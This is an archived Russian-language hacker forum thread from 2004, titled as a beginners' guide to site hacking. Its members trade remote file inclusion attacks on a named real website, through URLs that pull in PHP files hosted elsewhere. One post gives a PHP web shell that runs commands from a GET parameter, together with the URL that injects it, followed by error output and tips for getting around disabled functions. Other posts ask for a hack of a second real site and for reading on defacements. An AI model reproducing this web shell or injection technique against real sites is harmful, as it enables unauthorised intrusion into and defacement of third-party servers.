Просмотр полной версии : Взлом сайта. Для начаниющих
Даю адрес сайта, жирном выделяю намек на уязвимсоть:
http://klezz.fatal.ru/index.php?v/full.htm
Вот подумайте.
Меня она очень удивила когда я там (кто знает тот поймет) увидел сайт античата =) :rolleyes:
Сайт ломается!!!
где ты тама увидел сайт античата?
а сайт не ломается...
команды не хочет выполнять...
SURRENDER
16.12.2004, 05:59
kyzmi4, либо адрес карявый, либо это не переменная...
Егорыч+++
16.12.2004, 10:23
Да ломается.... Но я точно ломать не буду
как вы команды выполняете?
пишет аот что:
Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in http://[target]/shell.txt on line 12
и вот:
Warning: system(): Cannot execute a blank command in http://[target]/shell_pre.php?cmd=ls%20-la on line 3
че не так?
Егорыч+++
16.12.2004, 18:44
в принципе все не так... не все так тривиально...
а я как всегда ниче не понял http://klezz.fatal.ru/index.php?v/full.htm
че тут за уязвимость?
Егорыч+++
16.12.2004, 20:03
http://klezz.fatal.ru/index.php?http://www.ru - а вот это понятно? или все еще нет?
неа,ладно,не надо объяснять,всё равно не пойму(
Че Гевара
16.12.2004, 21:40
А что тут не понимать ?
http://klezz.fatal.ru/index.php?http://xssteam.narod.ru/pizdez.php - это тоже непонятно ?
где
http://xssteam.narod.ru/pizdez.php
содержит одну строчку ...
<?
phpinfo();
?>
Админы, почему вы все время отвечаете загадками? Неужеле вы желаете, чтобы мы во всем разобрались сами? :) Если же не все так тривиально, почему бы не объяснить?
как бы так сказать,я первый раз на прошлой неделе понял что же такое скрипт,поэтому что либо мне пока объяснять-почти бессмысленно
ВОПРОС:
Написал PHP файл. Имя zz.txt
<?
if (!empty($_GET['c'])) {
echo '<pre>';
system($_GET['c']);
echo '</pre>';
}
exit;
?>
Далее залил на народ ру, прописую http://klezz.fatal.ru/index.php?http://zattack.narod.ru/zz.txt&c=ls%20-l
Нечего не получаеться... Я что-то неправильно делаю??? :confused:
Егорыч+++
17.12.2004, 10:23
Там команда систем не работает. Нужно пользоваться функциями Php
Там команда систем не работает. Нужно пользоваться функциями Php
А… понятно… тнкс.
А есть какой нибудь pizdez для http://student.aipet.kz/
А есть какой нибудь pizdez для http://student.aipet.kz/
Я там ничего ненашел :(
Ну что я могу сказать. Учитесь товарищи. Я ведь непросто так дал эту ссылку и зачем орать, что там нет уязвимость. Ненадо спрашивать, как сломать. Нужно полазить посайту, почитать книги. На заметку мне всего 16 лет. Я может не хакер, совсем,нет. Я такойже был, мне надо было все разжевать и положить в рот, но вкой веке дешевая порнуха задолбала и я начал читать книги, лазить по сайтам. Единственный сайт, который мне больше всего нравится это Античат. Добрые админы, хорошие статьи, отличное видео. Вместе с Античатом мы пройдем огонь и воду.
На заметку мне всего 16 лет
мне 15, и мне тоже понравился античат, и я тоже не хакер, и я тоже читаю книги, и мне тоже задолбала порнуха, НО! если бы у меня спросили где дыра в этом сайте, то я бы ответил...
Парни, ВМЕСТЕ мы пройдем ОГОНЬ и ВОДУ!!! ВМЕСТЕ, А не по одиночке...
мне 15, и мне тоже понравился античат, и я тоже не хакер, и я тоже читаю книги, и мне тоже задолбала порнуха, НО! если бы у меня спросили где дыра в этом сайте, то я бы ответил...
Парни, ВМЕСТЕ мы пройдем ОГОНЬ и ВОДУ!!! ВМЕСТЕ, А не по одиночке...
мне тоже 15, но я почти ниче не понимаю в хацкерстве,а насчет огня и воды-а медные трубы где??? :)
Че Гевара
18.12.2004, 18:48
если бы у меня спросили где дыра в этом сайте, то я бы ответил...
Не античат ли ты имеешь ввиду ? ))
мне 15, и мне тоже понравился античат, и я тоже не хакер, и я тоже читаю книги, и мне тоже задолбала порнуха, НО! если бы у меня спросили где дыра в этом сайте, то я бы ответил...
Парни, ВМЕСТЕ мы пройдем ОГОНЬ и ВОДУ!!! ВМЕСТЕ, А не по одиночке...
А в начале топика орал, что сайт сломать нельзя, что он невыполняет клманды. А потом что тебе ваше нечего необьясняют :rolleyes:
PEPSICOLA
20.12.2004, 17:25
pizdez! :D
А где про дефейсы почитать можно?...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot